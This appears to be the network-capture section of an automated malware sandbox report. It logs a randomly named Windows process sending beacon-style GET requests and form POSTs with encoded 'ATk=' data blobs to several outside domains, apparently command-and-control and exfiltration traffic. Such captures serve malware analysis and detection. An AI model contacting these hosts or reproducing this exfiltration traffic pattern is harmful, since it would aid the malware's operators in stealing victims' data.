71 55 42 59 57 43 63 66 70 73 42 33 44 54 46 6c 6d 44 71 4c 66 47 46 75 34 49 4d 4a 4c 47 58 61 5a 73 57 63 65 61 47 6a 42 4e 32 67 31 77 76 49 4a 6c 65 77 56 79 42 74 69 45 35 32 54 31 42 43 6e 6d 6d 75 38 48 59 66 68 33 71 63 39 6d 4a 48 62 54 38 75 61 37 56 35 59 7a 74 4d 34 45 74 68 50 38 61 57 71 53 4f 54 78 66 79 44 68 2f 59 51 59 52 56 67 6b 76 75 6b 57 36 75 46 6f 70 64 4c 70 31 48 6c 2b 4a 77 67 66 69 4c 75 2b 71 70 43 42 31 55 4c 54 4d 4f 37 39 31 33 62 4c 79 78 62 50 2b 74 57 5a 55 64 34 6a 47 55 2b 4a 31 73 45 6b 49 76 35 4e 5a 36 58 2f 4d 62 45 79 47 59 32 52 44 51 42 36 6f 6e 4e 4a 67 58 2b 34 6a 73 6b 52 33 35 41 73 53 69 79 67 32 39 4c 44 34 7a 30 50 76 68 32 52 51 57 6a 4e 6b 72 54 6d 75 6a 42 58 30 34 32 54 37 59 44 51 65 33 64 65 6a 43 4b 6c 42 70 52 79 34 5a 55 73 68 41 72 56 45 69 2f 4b 68 35 35 67 43 51 64 48 76 45 72 30 53 56 64 4a 2b 37 57 4b 6b 34 75 30 42 38 77 75 6b 53 41 4e 77 54 6c 6f 76 37 62 71 42 4b 5a 4a 61 74 4a 74 77 75 65 79 39 73 52 [TRUNCATED] Data Ascii: ATk=d7v1R8qUBYWCcfpsB3DTFlmDqLfGFu4IMJLGXaZsWceaGjBN2g1wvIJlewVyBtiE52T1BCnmmu8HYfh3qc9mJHbT8ua7V5YztM4EthP8aWqSOTxfyDh/YQYRVgkvukW6uFopdLp1Hl+JwgfiLu+qpCB1ULTMO7913bLyxbP+tWZUd4jGU+J1sEkIv5NZ6X/MbEyGY2RDQB6onNJgX+4jskR35AsSiyg29LD4z0Pvh2RQWjNkrTmujBX042T7YDQe3dejCKlBpRy4ZUshArVEi/Kh55gCQdHvEr0SVdJ+7WKk4u0B8wukSANwTlov7bqBKZJatJtwuey9sRcxh/f9BC/yLWh9/pt0fUlQoSHF/9cnI2fYZwSKRJc38doufc1IgnifVPwb/uMLWJzwbiGnudvThvfyCh15Squo8JPz7Sbs8lQUOF11WPSLdNayD/fcCEyY1Jw++Zjh8EC/CFlHkTuN7arieYKeGa+sJEH2TABjTjoF+mmmZ3WUOCUqv8eGLhY9+5lzpCJQ9N9XC+rMu71Uayl0nhX5TayZ4Q7qFFNNgCA0r0a1Lgvl8j4JPJFxOylI0cNkahPdJJPfnlqXDWiTz0YcuV+YB78FFEwuq34DqTI48CRelaiMACfOcqq8DaYJyUmqWY/Qubf079C9DQe3/6RKKcGqnGmjpfDN556yFYJ7417wckad/RkWaXFSGBp3Xfo++c4skVq0PVIkG/s75qKz5OACh1k5jUymOqcxkiebGKFo6qFY7MeVdr1fXeRqOJzNbN7SBECrWyT7rGDYgMbYB6Z1nTrtkC9WotmfubWPC6jwS2Y6uZCe0vVf1g/uAUNq5idU8QrJ6rBO+JQoqha42kI26Ej4fM3kOuWtqIbOmoLtervmCYl42ZXadxYajtL7mU77P7ADTU0Edujg2Mn/cYpnoFU5CPmGKl63LFSoqSoV31Cq3eXnTr9qzbui/x5+94Uu8f2lyeE2Lx0BsEuTlEuJHg0qYC/AIECmsB+Y [TRUNCATED]
Oct 11, 2024 10:04:02.174928904 CEST	5413	OUT	Data Raw: 4c 59 44 71 69 65 63 65 39 74 54 70 47 32 30 79 77 4c 74 31 68 76 30 4b 6c 4d 6d 36 59 61 74 79 6b 44 56 67 45 49 68 44 6f 6a 50 4d 4a 2f 53 41 5a 7a 6d 6f 61 2b 70 67 41 4e 56 4c 75 33 30 62 6c 55 30 77 4c 32 35 39 61 75 72 2f 53 73 49 6c 33 62 Data Ascii: LYDqiece9tTpG20ywLt1hv0KlMm6YatykDVgEIhDojPMJ/SAZzmoa+pgANVLu30blU0wL259aur/SsIl3b/WvXMdGmJKAfWVPC72TlAtQeqA/CeXB3cpfed0WMg6gUsTlTx4Dnvyq4sDYUxoa5ZdfZGMxzE1lWA2sMOcSxG8sZ/k0mz+QtcWYIL9Fv6at+CkEdyYqYVhv8P5jsAiShNmXxRxwbCXbyWRM3pgl3CKhwqHajr+6NZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.11.20	49874	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:04.812009096 CEST	549	OUT	GET /hv5a/?ATk=Q5HVSLioRpHXZuVJMziOfiuU0onjCcEbGsrAfvZObs+1KXx/rQhduJNWJTpzG+WdwhfwBTLLmLhvS41bu9oAO2bNxYC9M61ukvJIhxXLVlHkTxp4qBAlfQs=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.wineservicesgroup.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:04:11.864758015 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:04:11 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 54 6b 3d 51 35 48 56 53 4c 69 6f 52 70 48 58 5a 75 56 4a 4d 7a 69 4f 66 69 75 55 30 6f 6e 6a 43 63 45 62 47 73 72 41 66 76 5a 4f 62 73 2b 31 4b 58 78 2f 72 51 68 64 75 4a 4e 57 4a 54 70 7a 47 2b 57 64 77 68 66 77 42 54 4c 4c 6d 4c 68 76 53 34 31 62 75 39 6f 41 4f 32 62 4e 78 59 43 39 4d 36 31 75 6b 76 4a 49 68 78 58 4c 56 6c 48 6b 54 78 70 34 71 42 41 6c 66 51 73 3d 26 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ATk=Q5HVSLioRpHXZuVJMziOfiuU0onjCcEbGsrAfvZObs+1KXx/rQhduJNWJTpzG+WdwhfwBTLLmLhvS41bu9oAO2bNxYC9M61ukvJIhxXLVlHkTxp4qBAlfQs=&VDohI=5PBL_pQpTf5haV"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.11.20	49875	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:17.089647055 CEST	795	OUT	POST /9bnb/ HTTP/1.1 Host: www.1clickw2.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.1clickw2.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.1clickw2.net/9bnb/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 61 69 2f 50 6d 57 6f 7a 6d 32 7a 61 6b 62 6a 32 56 65 4f 70 47 50 71 75 41 57 64 6d 59 6a 4e 2b 30 41 2b 37 54 54 38 32 54 6d 49 2b 2b 6f 67 70 51 4c 35 65 34 59 33 57 78 4d 2f 32 57 70 78 35 56 62 35 57 6c 61 31 68 45 34 4a 36 2f 72 79 4f 78 45 70 6c 36 4d 30 39 7a 6f 4a 43 71 39 72 70 44 79 62 57 70 77 4f 4b 64 45 45 30 51 52 6b 66 47 4c 33 50 57 33 55 4b 33 39 35 30 55 42 48 6e 69 78 43 51 70 71 75 65 58 42 75 6a 43 30 79 31 2b 4d 74 79 57 70 63 50 47 41 79 59 38 61 53 57 37 54 42 31 45 6b 4e 4d 6e 5a 55 6e 6a 32 46 6c 61 50 4f 54 44 68 4e 65 54 71 48 50 32 50 78 65 30 51 3d 3d Data Ascii: ATk=ai/PmWozm2zakbj2VeOpGPquAWdmYjN+0A+7TT82TmI++ogpQL5e4Y3WxM/2Wpx5Vb5Wla1hE4J6/ryOxEpl6M09zoJCq9rpDybWpwOKdEE0QRkfGL3PW3UK3950UBHnixCQpqueXBujC0y1+MtyWpcPGAyY8aSW7TB1EkNMnZUnj2FlaPOTDhNeTqHP2Pxe0Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.11.20	49876	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:19.717530966 CEST	815	OUT	POST /9bnb/ HTTP/1.1 Host: www.1clickw2.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.1clickw2.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.1clickw2.net/9bnb/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 61 69 2f 50 6d 57 6f 7a 6d 32 7a 61 6c 36 7a 32 47 74 6d 70 41 76 71 74 63 47 64 6d 58 44 4e 36 30 41 79 37 54 53 6f 6d 54 77 67 2b 39 4a 51 70 54 4b 35 65 2f 59 33 57 36 73 2f 33 5a 4a 78 45 56 62 38 70 6c 59 78 68 45 34 74 36 2f 72 43 4f 77 33 78 69 67 38 30 2f 34 49 4a 4d 6e 64 72 70 44 79 62 57 70 77 4b 77 64 43 73 30 51 68 34 66 58 61 33 4d 4b 6e 55 4a 2b 64 35 30 43 42 47 75 69 78 44 48 70 72 79 30 58 43 57 6a 43 30 69 31 2b 64 74 7a 63 70 64 4b 4d 67 7a 76 76 5a 4c 65 38 77 6c 41 49 48 6c 4a 2b 72 6f 67 6d 67 55 2f 48 39 36 33 41 79 52 73 58 61 2b 6e 30 4e 77 46 70 5a 67 76 52 32 59 50 51 47 51 39 2f 30 35 50 4b 6d 49 39 65 78 30 3d Data Ascii: ATk=ai/PmWozm2zal6z2GtmpAvqtcGdmXDN60Ay7TSomTwg+9JQpTK5e/Y3W6s/3ZJxEVb8plYxhE4t6/rCOw3xig80/4IJMndrpDybWpwKwdCs0Qh4fXa3MKnUJ+d50CBGuixDHpry0XCWjC0i1+dtzcpdKMgzvvZLe8wlAIHlJ+rogmgU/H963AyRsXa+n0NwFpZgvR2YPQGQ9/05PKmI9ex0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.11.20	49877	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:22.357806921 CEST	7964	OUT	POST /9bnb/ HTTP/1.1 Host: www.1clickw2.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.1clickw2.net Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.1clickw2.net/9bnb/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 61 69 2f 50 6d 57 6f 7a 6d 32 7a 61 6c 36 7a 32 47 74 6d 70 41 76 71 74 63 47 64 6d 58 44 4e 36 30 41 79 37 54 53 6f 6d 54 77 6f 2b 2b 36 49 70 51 70 52 65 2b 59 33 57 7a 4d 2f 36 5a 4a 78 6a 56 62 46 67 6c 59 39 75 45 36 46 36 38 4b 69 4f 68 79 64 69 75 4d 30 2f 33 6f 4a 42 71 39 71 68 44 79 72 73 70 77 36 77 64 43 73 30 51 6a 4d 66 58 4c 33 4d 5a 58 55 4b 33 39 35 77 55 42 47 47 69 78 4c 58 70 72 32 4f 57 79 32 6a 43 56 53 31 7a 50 46 7a 51 70 64 45 50 67 7a 33 76 5a 33 52 38 77 4a 6d 49 47 52 76 2b 73 55 67 6e 58 68 45 51 63 66 76 61 31 6f 75 62 72 75 69 37 66 38 54 69 34 38 49 51 6c 6f 6c 52 41 73 62 2b 43 41 50 56 46 52 39 46 6b 7a 31 45 77 73 4b 45 74 6c 66 5a 6e 70 46 64 68 54 55 56 63 42 55 6a 68 55 74 4c 35 32 50 6e 50 72 4e 58 78 6a 6d 6f 5a 68 61 4b 32 64 4f 5a 57 37 4a 72 73 6a 5a 54 74 39 47 44 4f 39 46 51 58 6d 4a 55 43 68 73 73 6d 50 54 4d 70 4b 64 4a 63 36 34 61 53 39 38 79 71 41 50 65 2f 31 4f 64 58 66 35 46 4a 71 42 4a 6e 50 75 36 6e 6e 42 75 79 61 42 79 46 6c 73 41 74 [TRUNCATED] Data Ascii: ATk=ai/PmWozm2zal6z2GtmpAvqtcGdmXDN60Ay7TSomTwo++6IpQpRe+Y3WzM/6ZJxjVbFglY9uE6F68KiOhydiuM0/3oJBq9qhDyrspw6wdCs0QjMfXL3MZXUK395wUBGGixLXpr2OWy2jCVS1zPFzQpdEPgz3vZ3R8wJmIGRv+sUgnXhEQcfva1oubrui7f8Ti48IQlolRAsb+CAPVFR9Fkz1EwsKEtlfZnpFdhTUVcBUjhUtL52PnPrNXxjmoZhaK2dOZW7JrsjZTt9GDO9FQXmJUChssmPTMpKdJc64aS98yqAPe/1OdXf5FJqBJnPu6nnBuyaByFlsAtACkGlGLhYcIGi6ycxYTaOcZZkVlWONwmc40f27SrKN6CPgVxzE9C52xco0b95IdElkBNHwJ6iQTikAkuSskwGz2h1H4ebSD2iGiobyoLt+HsWihHuq15NrQLuevPy6b16Fw4m/TOvjb0ReSKUR2FZgcUEk1aYHMQclQDynmHLqOUQ+3rbBCUQZ20dHGz9DTzffFMHYxmQlH216KWVFiNR4+Hden6YMPSDx9xFi2RSPUPLBukMg8sWySmO5BvNvlyYPDZWF5ySWbLMT0RZozIkDWgN79S8TupzyqyiMJ73HGaS7ItCAD1I4q8WPscXH4/546rFlflXSntX45cY9gTrupfhNgNj1MzuRf9FJenAzk1IJOzD4QWdEL7XSUmrrQerf3vDeZhpqyxBqu3xsVoD/USXQ/Dem/BT2YQcKsXpp3bDZZuYmJlsbcePNANJqbloJpe4jcvo0RS9s0MEvFOS3FZadPskBe7x3p6ENuIR5bWUKbjKaDxG3oIB4upgAFaR+TE/+C3FvXL54NHEG+JqckS8LRX+ECBebJHZo6cxWdASCov2u+44jZyYOia1a+BU1kMoEdbdi4jac79TFIAWbttwMFRkEqZhInE8AQR5AFDoiaTFOtpCJ+moghqCnPEwoWDaEG6dO/sRybsME42eZYVR+xQYrolxF [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.11.20	49878	15.197.148.33	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:24.995244980 CEST	540	OUT	GET /9bnb/?ATk=XgXvlhFLn0yasIzwV8HNefiGaWxYWjFs+Vu5QhEKO2I7xekKRpo59pX70vTgc6tofct2g55bDtxMjf3b70N1jPElytkl9t3yc3m2himnW0R7Cxc4fJK3SCo=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.1clickw2.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:04:26.018672943 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:04:25 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 54 6b 3d 58 67 58 76 6c 68 46 4c 6e 30 79 61 73 49 7a 77 56 38 48 4e 65 66 69 47 61 57 78 59 57 6a 46 73 2b 56 75 35 51 68 45 4b 4f 32 49 37 78 65 6b 4b 52 70 6f 35 39 70 58 37 30 76 54 67 63 36 74 6f 66 63 74 32 67 35 35 62 44 74 78 4d 6a 66 33 62 37 30 4e 31 6a 50 45 6c 79 74 6b 6c 39 74 33 79 63 33 6d 32 68 69 6d 6e 57 30 52 37 43 78 63 34 66 4a 4b 33 53 43 6f 3d 26 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ATk=XgXvlhFLn0yasIzwV8HNefiGaWxYWjFs+Vu5QhEKO2I7xekKRpo59pX70vTgc6tofct2g55bDtxMjf3b70N1jPElytkl9t3yc3m2himnW0R7Cxc4fJK3SCo=&VDohI=5PBL_pQpTf5haV"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.11.20	49879	3.33.130.190	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:34.210796118 CEST	547	OUT	GET /63ck/?VDohI=5PBL_pQpTf5haV&ATk=GQYraOg50FzHvWxTy80tg7qVvSVsbKUl1pszYO6BquwY8zCRfPuOPPXv6opwWQ+1qa0YVJN1ZlZd4AL6pjVcwJbg0c3Bicl+U/54azLqH+7Ms3QB2BiQv0s= HTTP/1.1 Host: www.academyinmotion.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:04:34.312469959 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:04:34 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 26 41 54 6b 3d 47 51 59 72 61 4f 67 35 30 46 7a 48 76 57 78 54 79 38 30 74 67 37 71 56 76 53 56 73 62 4b 55 6c 31 70 73 7a 59 4f 36 42 71 75 77 59 38 7a 43 52 66 50 75 4f 50 50 58 76 36 6f 70 77 57 51 2b 31 71 61 30 59 56 4a 4e 31 5a 6c 5a 64 34 41 4c 36 70 6a 56 63 77 4a 62 67 30 63 33 42 69 63 6c 2b 55 2f 35 34 61 7a 4c 71 48 2b 37 4d 73 33 51 42 32 42 69 51 76 30 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VDohI=5PBL_pQpTf5haV&ATk=GQYraOg50FzHvWxTy80tg7qVvSVsbKUl1pszYO6BquwY8zCRfPuOPPXv6opwWQ+1qa0YVJN1ZlZd4AL6pjVcwJbg0c3Bicl+U/54azLqH+7Ms3QB2BiQv0s="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.11.20	49880	75.2.103.23	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:39.432358027 CEST	795	OUT	POST /o7wc/ HTTP/1.1 Host: www.heeraka.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.heeraka.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.heeraka.info/o7wc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 71 71 72 4c 76 30 35 53 38 74 70 52 73 6d 58 31 5a 6b 62 52 30 6a 45 79 5a 43 72 38 34 31 31 6f 71 70 36 32 57 43 51 73 2f 45 7a 74 69 71 2f 34 66 30 53 64 75 69 64 33 39 70 59 46 35 31 66 56 31 71 6b 56 6f 6e 71 75 57 49 35 72 6d 45 63 48 42 2f 4c 6f 63 49 7a 6a 68 32 31 4b 6c 74 75 78 54 45 37 50 44 6b 55 67 55 78 52 75 78 31 78 6b 4e 53 50 53 33 44 43 49 69 72 7a 52 4e 32 4d 33 73 73 54 47 6e 5a 6f 79 6c 4a 66 37 58 64 65 4f 79 35 2f 50 68 6a 43 35 31 66 2f 43 56 59 36 72 2b 50 67 73 4e 37 68 68 45 76 30 50 52 6f 45 34 2b 45 41 4f 71 78 32 65 4a 46 62 6c 79 51 6a 32 55 77 3d 3d Data Ascii: ATk=qqrLv05S8tpRsmX1ZkbR0jEyZCr8411oqp62WCQs/Eztiq/4f0Sduid39pYF51fV1qkVonquWI5rmEcHB/LocIzjh21KltuxTE7PDkUgUxRux1xkNSPS3DCIirzRN2M3ssTGnZoylJf7XdeOy5/PhjC51f/CVY6r+PgsN7hhEv0PRoE4+EAOqx2eJFblyQj2Uw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.11.20	49881	75.2.103.23	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:42.071374893 CEST	815	OUT	POST /o7wc/ HTTP/1.1 Host: www.heeraka.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.heeraka.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.heeraka.info/o7wc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 71 71 72 4c 76 30 35 53 38 74 70 52 74 48 6e 31 4b 53 54 52 38 6a 45 39 63 43 72 38 79 56 31 73 71 70 2b 32 57 41 38 38 71 6e 58 74 68 50 44 34 59 77 4f 64 2b 79 64 33 70 35 59 4b 30 56 65 5a 31 71 6f 64 6f 6c 4f 75 57 49 74 72 6d 42 67 48 42 4f 4c 72 4f 6f 7a 68 6e 32 31 45 68 74 75 78 54 45 37 50 44 6e 6f 61 55 31 39 75 79 45 42 6b 4d 7a 50 52 36 6a 43 4c 30 62 7a 52 4a 32 4d 7a 73 73 53 54 6e 59 31 5a 6c 4e 76 37 58 63 75 4f 7a 6f 2f 4d 30 54 43 2f 34 2f 2b 6a 64 35 4c 30 78 75 56 61 64 59 56 75 4f 61 6b 6d 5a 65 56 69 6a 32 30 71 70 69 71 73 4e 31 69 4e 77 53 69 74 4a 7a 66 42 4b 2b 34 57 4d 4f 4f 32 70 55 57 33 6f 78 53 69 42 59 77 3d Data Ascii: ATk=qqrLv05S8tpRtHn1KSTR8jE9cCr8yV1sqp+2WA88qnXthPD4YwOd+yd3p5YK0VeZ1qodolOuWItrmBgHBOLrOozhn21EhtuxTE7PDnoaU19uyEBkMzPR6jCL0bzRJ2MzssSTnY1ZlNv7XcuOzo/M0TC/4/+jd5L0xuVadYVuOakmZeVij20qpiqsN1iNwSitJzfBK+4WMOO2pUW3oxSiBYw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.11.20	49882	75.2.103.23	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:04:44.713896990 CEST	2578	OUT	POST /o7wc/ HTTP/1.1 Host: www.heeraka.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.heeraka.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.heeraka.info/o7wc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 71 71 72 4c 76 30 35 53 38 74 70 52 74 48 6e 31 4b 53 54 52 38 6a 45 39 63 43 72 38 79 56 31 73 71 70 2b 32 57 41 38 38 71 6e 66 74 68 35 58 34 59 52 4f 64 39 79 64 33 71 35 59 4a 30 56 65 55 31 71 67 5a 6f 6c 79 59 57 4b 56 72 6d 6a 59 48 44 38 6a 72 46 6f 7a 68 6c 32 31 4a 6c 74 75 6b 54 41 66 44 44 6b 41 61 55 31 39 75 79 47 5a 6b 46 43 50 52 38 6a 43 49 69 72 7a 4e 4e 32 4e 55 73 73 62 6f 6e 59 78 76 6c 65 6e 37 55 2f 57 4f 78 61 58 4d 6f 44 43 39 35 2f 2b 42 64 35 48 52 78 75 34 6c 64 5a 77 6d 4f 64 34 6d 5a 59 34 68 33 79 38 68 7a 41 37 37 48 57 32 74 32 51 75 59 4c 55 58 45 42 73 34 34 47 37 76 69 70 58 48 34 38 42 53 59 62 76 78 56 50 4e 6f 38 56 6d 75 75 43 45 6f 6f 63 78 5a 54 2f 6d 61 47 32 4b 47 37 73 61 70 2b 74 2f 67 65 39 4b 49 6a 37 42 65 74 71 73 6d 32 39 74 48 48 53 37 66 31 4b 6d 63 42 5a 30 64 48 42 44 43 64 33 47 75 6c 52 42 71 32 30 63 68 4f 4b 73 6c 41 6f 51 62 32 5a 4a 7a 49 58 47 46 38 79 46 55 45 38 33 63 73 77 5a 33 63 75 4b 61 4d 45 49 62 58 73 46 41 45 79 65 [TRUNCATED] Data Ascii: 